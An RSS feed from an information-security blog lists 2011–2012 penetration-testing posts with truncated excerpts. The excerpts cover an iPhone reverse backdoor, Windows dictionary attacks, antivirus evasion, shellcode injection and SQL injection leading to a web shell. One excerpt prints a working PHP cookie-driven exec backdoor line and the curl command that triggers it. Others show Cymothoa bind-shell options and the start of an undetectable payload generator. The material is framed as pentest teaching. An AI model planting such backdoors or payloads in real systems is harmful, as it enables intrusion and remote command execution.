<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Coresec.org - Information Security Blog</title>
	<atom:link href="http://www.coresec.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.coresec.org</link>
	<description></description>
	<lastBuildDate>Tue, 24 Apr 2012 11:50:41 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Permanent Reverse Backdoor for IPhone / IPad</title>
		<link>http://www.coresec.org/2012/04/24/permanent-reverse-backdoor-for-iphone-ipad/</link>
		<comments>http://www.coresec.org/2012/04/24/permanent-reverse-backdoor-for-iphone-ipad/#comments</comments>
		<pubDate>Tue, 24 Apr 2012 11:50:41 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[access]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[brute]]></category>
		<category><![CDATA[connect]]></category>
		<category><![CDATA[daemon]]></category>
		<category><![CDATA[encrypted]]></category>
		<category><![CDATA[force]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[ios]]></category>
		<category><![CDATA[ipad]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[iphone 4]]></category>
		<category><![CDATA[jailbrake]]></category>
		<category><![CDATA[launchdaemons]]></category>
		<category><![CDATA[permanent]]></category>
		<category><![CDATA[powned]]></category>
		<category><![CDATA[reverse]]></category>
		<category><![CDATA[RunAtLoad]]></category>
		<category><![CDATA[sbd]]></category>
		<category><![CDATA[tcp]]></category>
		<category><![CDATA[tunnel]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2441</guid>
		<description><![CDATA[During a security audit i have gained access to jailbroken iphone 4 by using ssh brute force attack. I was able to connect to the device using ssh and i tried to install a permanent reverse tcp backdoor on it. Specifically, i have used the sbd-1.36 backdoor from Michel Blomgren. Below i am describing the [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2012/04/24/permanent-reverse-backdoor-for-iphone-ipad/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Windows Dictionary Attacks</title>
		<link>http://www.coresec.org/2012/04/14/windows-dictionary-attacks/</link>
		<comments>http://www.coresec.org/2012/04/14/windows-dictionary-attacks/#comments</comments>
		<pubDate>Sat, 14 Apr 2012 18:05:07 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[Cracking]]></category>
		<category><![CDATA[PenTest]]></category>
		<category><![CDATA[accounts]]></category>
		<category><![CDATA[adfind]]></category>
		<category><![CDATA[attacks]]></category>
		<category><![CDATA[brute]]></category>
		<category><![CDATA[controller]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[dictionary]]></category>
		<category><![CDATA[domain]]></category>
		<category><![CDATA[dumpsec]]></category>
		<category><![CDATA[enumerate]]></category>
		<category><![CDATA[enumeration]]></category>
		<category><![CDATA[findpdc]]></category>
		<category><![CDATA[force]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hydra]]></category>
		<category><![CDATA[lockout]]></category>
		<category><![CDATA[medusa]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[nbtstat]]></category>
		<category><![CDATA[nltest]]></category>
		<category><![CDATA[nmap]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[passwords]]></category>
		<category><![CDATA[policy]]></category>
		<category><![CDATA[reverseraider]]></category>
		<category><![CDATA[sniffing]]></category>
		<category><![CDATA[users]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[wmi]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2431</guid>
		<description><![CDATA[In this article, Scott Sutherland describes how to perform dictionary attacks against Active Directory accounts safely. Identify domains Enumerate domain controllers Enumerate users from domain controllers Enumerate password policy from domain controllers Perform dictionary attack Identify Domains Below are a few common methods for enumerating Windows domains as an unauthenticated user. ipconfig / ifconfig In [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2012/04/14/windows-dictionary-attacks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP Stealth Backdoors</title>
		<link>http://www.coresec.org/2012/03/30/php-stealth-backdoors/</link>
		<comments>http://www.coresec.org/2012/03/30/php-stealth-backdoors/#comments</comments>
		<pubDate>Fri, 30 Mar 2012 19:57:49 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[base64]]></category>
		<category><![CDATA[cmd]]></category>
		<category><![CDATA[commands]]></category>
		<category><![CDATA[cookie]]></category>
		<category><![CDATA[encoding]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[exec]]></category>
		<category><![CDATA[execution]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[headers]]></category>
		<category><![CDATA[htaccess]]></category>
		<category><![CDATA[http]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[webshell]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2423</guid>
		<description><![CDATA[1) Using cookie Select All Code:&#60;?php @header(’Hidden-Field: '.@exec($_COOKIE['cmd'])); echo &#34;&#60;p&#62;hello&#60;/p&#62;&#34;; ?&#62; Example: curl ‘http://target/cookie.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3′ -e ‘http://www.google.com/’ 2) Using HTTP Headers Select All Code:&#60;?php &#60;?php @header(’Hidden-Field: '.@exec($_COOKIE['cmd'])); echo &#34;&#60;p&#62;hello&#60;/p&#62;&#34;; ?&#62; Example: curl -v ‘http://target/headers.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2012/03/30/php-stealth-backdoors/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Cymothoa &#8211; Inject Shellcode into an existing process</title>
		<link>http://www.coresec.org/2011/12/24/cymothoa-inject-shellcode-into-an-existing-process/</link>
		<comments>http://www.coresec.org/2011/12/24/cymothoa-inject-shellcode-into-an-existing-process/#comments</comments>
		<pubDate>Fri, 23 Dec 2011 22:51:13 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[access]]></category>
		<category><![CDATA[attach]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[backdooring]]></category>
		<category><![CDATA[cymothoa]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[infect]]></category>
		<category><![CDATA[infection]]></category>
		<category><![CDATA[inject]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[payload]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pid]]></category>
		<category><![CDATA[process]]></category>
		<category><![CDATA[processes]]></category>
		<category><![CDATA[ptrace]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[shellcode]]></category>
		<category><![CDATA[stealth]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[tool]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2416</guid>
		<description><![CDATA[Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them. Select All Code:root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -S &#160; 0 - bind /bin/sh to the provided port (requires -y) 1 - bind /bin/sh + fork() to [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/12/24/cymothoa-inject-shellcode-into-an-existing-process/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Disabling AntiVirus during Pen Testing</title>
		<link>http://www.coresec.org/2011/12/05/disabling-antivirus-during-pen-testing/</link>
		<comments>http://www.coresec.org/2011/12/05/disabling-antivirus-during-pen-testing/#comments</comments>
		<pubDate>Mon, 05 Dec 2011 19:47:48 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[antivirus]]></category>
		<category><![CDATA[assessment]]></category>
		<category><![CDATA[avg]]></category>
		<category><![CDATA[disable]]></category>
		<category><![CDATA[endpoint]]></category>
		<category><![CDATA[engines]]></category>
		<category><![CDATA[forefront]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[protection]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[symantec]]></category>
		<category><![CDATA[test]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2411</guid>
		<description><![CDATA[When penetration testing, and targeting Windows systems, writing some executable content to the file system is invariably required at some stage.   Unfortunately today, the antivirus vendors have become quite adept with signatures that match assembly stub routines that are used to inject malware into a system.   The A/V guys will also pick up [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/12/05/disabling-antivirus-during-pen-testing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FUD Payload Generator for Backtrack</title>
		<link>http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/</link>
		<comments>http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/#comments</comments>
		<pubDate>Wed, 09 Nov 2011 21:28:40 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[crypt]]></category>
		<category><![CDATA[detected]]></category>
		<category><![CDATA[fud]]></category>
		<category><![CDATA[generate]]></category>
		<category><![CDATA[generator]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[novirusthanks]]></category>
		<category><![CDATA[payload]]></category>
		<category><![CDATA[reverse]]></category>
		<category><![CDATA[shellcode]]></category>
		<category><![CDATA[stub]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[undetectable]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2311</guid>
		<description><![CDATA[Today based on Astr0baby&#8217;s article on how can we create a fully undetectable metasploit payload, i modified his REVERSE_TCP Payload Generator in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works: Select All Code:#!/bin/bash echo &#34;************************************************************&#34; echo &#34; Automatic shellcode generator - [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/feed/</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>[Tip] OpenVAS Fast Start</title>
		<link>http://www.coresec.org/2011/11/09/tip-openvas-fast-start/</link>
		<comments>http://www.coresec.org/2011/11/09/tip-openvas-fast-start/#comments</comments>
		<pubDate>Wed, 09 Nov 2011 20:15:09 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[assessment]]></category>
		<category><![CDATA[assistant]]></category>
		<category><![CDATA[audit]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[brute]]></category>
		<category><![CDATA[check]]></category>
		<category><![CDATA[configure]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[force]]></category>
		<category><![CDATA[gathering]]></category>
		<category><![CDATA[greenbone]]></category>
		<category><![CDATA[information]]></category>
		<category><![CDATA[install]]></category>
		<category><![CDATA[interface]]></category>
		<category><![CDATA[management]]></category>
		<category><![CDATA[openvas]]></category>
		<category><![CDATA[plugins]]></category>
		<category><![CDATA[reporting]]></category>
		<category><![CDATA[reports]]></category>
		<category><![CDATA[scan]]></category>
		<category><![CDATA[scanner]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[test]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[web]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2307</guid>
		<description><![CDATA[OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. pen@test:~# apt-get install openvas pen@test:~# openvas-adduser pen@test:~# openvas-mkcert pen@test:~# openvas-nvt-sync pen@test:~# openvasd pen@test:~# openvas-mkcert-client -n om -i pen@test:~# openvasmd &#8211;rebuild pen@test:~# openvasad -c &#8216;add_user&#8217; -n openvasadmin -r Admin pen@test:~# openvasmd -p 9390 -a 127.0.0.1 pen@test:~# [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/11/09/tip-openvas-fast-start/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Intercepting Authentication Credentials Stored in Multifunction Printers</title>
		<link>http://www.coresec.org/2011/11/01/intercepting-authentication-credentials-stored-in-multifunction-printers/</link>
		<comments>http://www.coresec.org/2011/11/01/intercepting-authentication-credentials-stored-in-multifunction-printers/#comments</comments>
		<pubDate>Tue, 01 Nov 2011 18:57:22 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[Exploits/Vulns]]></category>
		<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[active]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[attacking]]></category>
		<category><![CDATA[authentication]]></category>
		<category><![CDATA[back]]></category>
		<category><![CDATA[burp]]></category>
		<category><![CDATA[burpproxy]]></category>
		<category><![CDATA[credentials]]></category>
		<category><![CDATA[directory]]></category>
		<category><![CDATA[foofus]]></category>
		<category><![CDATA[interception]]></category>
		<category><![CDATA[ldap]]></category>
		<category><![CDATA[mfp]]></category>
		<category><![CDATA[multifunction]]></category>
		<category><![CDATA[netcat]]></category>
		<category><![CDATA[pass]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[percx]]></category>
		<category><![CDATA[plaintext]]></category>
		<category><![CDATA[printer]]></category>
		<category><![CDATA[printers]]></category>
		<category><![CDATA[proxy]]></category>
		<category><![CDATA[ricoh]]></category>
		<category><![CDATA[sharp]]></category>
		<category><![CDATA[smb]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2298</guid>
		<description><![CDATA[During Defcon 19, percX  from foofus.net discussed a new attack method against printers. This attack method involved tricking the printer into passing LDAP or SMB credential back to attacker in plain text. According percX, this type of attack has been found to work on a number of Ricoh or rebranded Ricoh systems (specifically manufactured by [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/11/01/intercepting-authentication-credentials-stored-in-multifunction-printers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Social Engineering Poll – Endearment vs Authority</title>
		<link>http://www.coresec.org/2011/10/12/social-engineering-poll-%e2%80%93-endearment-vs-authority/</link>
		<comments>http://www.coresec.org/2011/10/12/social-engineering-poll-%e2%80%93-endearment-vs-authority/#comments</comments>
		<pubDate>Wed, 12 Oct 2011 19:00:05 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[authority]]></category>
		<category><![CDATA[employer]]></category>
		<category><![CDATA[endearment]]></category>
		<category><![CDATA[engineering]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[poll]]></category>
		<category><![CDATA[social]]></category>
		<category><![CDATA[testing]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2265</guid>
		<description><![CDATA[Endearment vs Authority This poll as based on two different stories.  The first showed how the principle of endearment and how it may be used by a malicious social engineer. The second story involved a social engineer employing the authority principle. By simply carrying a clipboard and acting in charge could a social engineer manipulate [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/10/12/social-engineering-poll-%e2%80%93-endearment-vs-authority/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Generate and Manage Stealth PHP backdoors</title>
		<link>http://www.coresec.org/2011/10/08/generate-and-manage-stealth-php-backdoors/</link>
		<comments>http://www.coresec.org/2011/10/08/generate-and-manage-stealth-php-backdoors/#comments</comments>
		<pubDate>Sat, 08 Oct 2011 18:44:11 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[application]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[backdoored]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[cloudflare]]></category>
		<category><![CDATA[command]]></category>
		<category><![CDATA[commands]]></category>
		<category><![CDATA[execute]]></category>
		<category><![CDATA[firewall]]></category>
		<category><![CDATA[firewalls]]></category>
		<category><![CDATA[hidden]]></category>
		<category><![CDATA[imperva]]></category>
		<category><![CDATA[invisible]]></category>
		<category><![CDATA[payload]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[restrictions]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[stealth]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[waf]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[weevely]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2232</guid>
		<description><![CDATA[Weevely create and manage PHP trojan designed to be hardly detectable. Is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions. With weevely you can generate PHP code to trojanize a [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/10/08/generate-and-manage-stealth-php-backdoors/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Online Penetration Testing Tools</title>
		<link>http://www.coresec.org/2011/10/08/online-penetration-testing-tools/</link>
		<comments>http://www.coresec.org/2011/10/08/online-penetration-testing-tools/#comments</comments>
		<pubDate>Sat, 08 Oct 2011 11:40:22 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[admin]]></category>
		<category><![CDATA[brute]]></category>
		<category><![CDATA[bruter]]></category>
		<category><![CDATA[force]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[LFI]]></category>
		<category><![CDATA[online]]></category>
		<category><![CDATA[page]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[port]]></category>
		<category><![CDATA[rdp]]></category>
		<category><![CDATA[scan]]></category>
		<category><![CDATA[scanner]]></category>
		<category><![CDATA[scanners]]></category>
		<category><![CDATA[sql]]></category>
		<category><![CDATA[ssh]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[tools]]></category>
		<category><![CDATA[vnc]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2218</guid>
		<description><![CDATA[Below you can find some Online Penetration Testing tools by Subhash Dasyam: Online Port Scanner http://scan.subhashdasyam.com/port-scanner.php Online VNC Scanner http://scan.subhashdasyam.com/dumper-with-login.php Online SSH Scanner http://scan.subhashdasyam.com/ssh-scanner.php Online Admin Page Bruter http://scan.subhashdasyam.com/admin-page-finder.php Online WordPress Admin/Password Bruter http://scan.subhashdasyam.com/wordpress-bruter.php Online LFI Scanner http://scan.subhashdasyam.com/lfi-scanner.php Online RDP Scanner http://scan.subhashdasyam.com/remote-desktop-scanner.php Fastest Online SQL Injection Values Dumper http://scan.subhashdasyam.com/dumper.php Fastest Online SQL Injection Values Dumper(Supports [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/10/08/online-penetration-testing-tools/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tactical Post Exploitation</title>
		<link>http://www.coresec.org/2011/10/06/tactical-post-exploitation/</link>
		<comments>http://www.coresec.org/2011/10/06/tactical-post-exploitation/#comments</comments>
		<pubDate>Thu, 06 Oct 2011 21:11:21 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[attacker]]></category>
		<category><![CDATA[compromised]]></category>
		<category><![CDATA[darkoperator]]></category>
		<category><![CDATA[derbycon]]></category>
		<category><![CDATA[ethical]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[exploitation]]></category>
		<category><![CDATA[gathering]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[information]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[post]]></category>
		<category><![CDATA[presentation]]></category>
		<category><![CDATA[system]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[testers]]></category>
		<category><![CDATA[testing]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2209</guid>
		<description><![CDATA[The following presentation from Carlos Perez (darkoperator) will cover the techniques and methods used by penetration testers and hackers, how do they enumerate and perform their tasks once on a compromised system and how to detect the tell tales signs of their presence and actions. For more Derbycon 2011 Videos: http://www.irongeek.com/i.php?page=videos/derbycon1/mainlist http://thehackernews.com/2011/10/derbycon-2011-videos-day-1-talks.html &#160;]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/10/06/tactical-post-exploitation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Penetration Testing Secrets</title>
		<link>http://www.coresec.org/2011/10/06/penetration-testing-secrets/</link>
		<comments>http://www.coresec.org/2011/10/06/penetration-testing-secrets/#comments</comments>
		<pubDate>Thu, 06 Oct 2011 20:56:32 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[class]]></category>
		<category><![CDATA[ethical]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[meterpreter]]></category>
		<category><![CDATA[penentration]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[secrets]]></category>
		<category><![CDATA[teaching]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[training]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2192</guid>
		<description><![CDATA[A nice technical presentation from Chris Gates and from Rob Fuller which was published during DerbyCon 2011 event:]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/10/06/penetration-testing-secrets/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Clickjacking for Shells</title>
		<link>http://www.coresec.org/2011/10/02/clickjacking-for-shells/</link>
		<comments>http://www.coresec.org/2011/10/02/clickjacking-for-shells/#comments</comments>
		<pubDate>Sun, 02 Oct 2011 08:22:16 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[Exploits/Vulns]]></category>
		<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[andrew]]></category>
		<category><![CDATA[clickjacking]]></category>
		<category><![CDATA[code]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[horton]]></category>
		<category><![CDATA[owasp]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[presentation]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[shells]]></category>
		<category><![CDATA[source]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[video]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2164</guid>
		<description><![CDATA[Andrew Horton (urbanadventurer) presented Clickjacking for Shells at the OWASP Wellington, New Zealand Chapter Meeting on September 20th, 2011 : Exploit code Security-Assessment.com WordPress Clickjacking Exploit.zip Download The ZIP file contains the following files: clickjack.php &#8211; The final clickjacking exploit index-1.html &#8211; Tutorial 1 of how to exploit clickjacking index-2.html &#8211; Tutorial 2 of how [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/10/02/clickjacking-for-shells/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[Tip] Post Exploitation Command Lists for Win, Unix, OSX</title>
		<link>http://www.coresec.org/2011/09/13/tip-post-exploitation-command-lists-for-win-unix-osx/</link>
		<comments>http://www.coresec.org/2011/09/13/tip-post-exploitation-command-lists-for-win-unix-osx/#comments</comments>
		<pubDate>Tue, 13 Sep 2011 17:48:44 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[bsd]]></category>
		<category><![CDATA[cheat]]></category>
		<category><![CDATA[command]]></category>
		<category><![CDATA[commands]]></category>
		<category><![CDATA[exploitation]]></category>
		<category><![CDATA[gathering]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[information]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[lists]]></category>
		<category><![CDATA[osx]]></category>
		<category><![CDATA[own]]></category>
		<category><![CDATA[owning]]></category>
		<category><![CDATA[post]]></category>
		<category><![CDATA[sheet]]></category>
		<category><![CDATA[unix]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2138</guid>
		<description><![CDATA[Here are some Cheat Sheet to use as a reminder after owning Windows, Linux or Mac systems: Linux/Unix/BSD Post Exploitation: Download Windows Post Exploitation: Download OSX Post Exploitation: Download [source: http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/09/13/tip-post-exploitation-command-lists-for-win-unix-osx/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>From SQL Injection to Backdoor Installation</title>
		<link>http://www.coresec.org/2011/09/02/from-sql-injection-to-backdoor-installation/</link>
		<comments>http://www.coresec.org/2011/09/02/from-sql-injection-to-backdoor-installation/#comments</comments>
		<pubDate>Fri, 02 Sep 2011 21:08:21 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[Exploits/Vulns]]></category>
		<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[access]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[create]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[datadir]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[inject]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[installation]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[phpshell]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[sql]]></category>
		<category><![CDATA[sqlmap]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[webserver]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2242</guid>
		<description><![CDATA[Imagine that our site is vulnerable to SQL Injection in the following link: Select All Code:http://www.foo.org/index.php?option=com_aardvertiser&#38;cat_name=user&#38;task=view Initially we will try to inject it by using sqlmap: Select All Code:root@bt:/sqlmap# ./sqlmap.py -u “http://www.foo.org/index.php?” –data “option=com_aardvertiser&#38;cat_name=user&#38;task=view” -p cat_name –dbs &#160; [03:18:19] [WARNING] POST parameter ‘cat_name’ is not injectable [03:18:19] [CRITICAL] all parameters appear to be not injectable. [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/09/02/from-sql-injection-to-backdoor-installation/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>[Break] How to crack 4096 bit encryption in 5 minutes</title>
		<link>http://www.coresec.org/2011/08/22/break-how-to-crack-4096-bit-encryption-in-5-minutes/</link>
		<comments>http://www.coresec.org/2011/08/22/break-how-to-crack-4096-bit-encryption-in-5-minutes/#comments</comments>
		<pubDate>Mon, 22 Aug 2011 19:41:03 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[Fun]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[cracking]]></category>
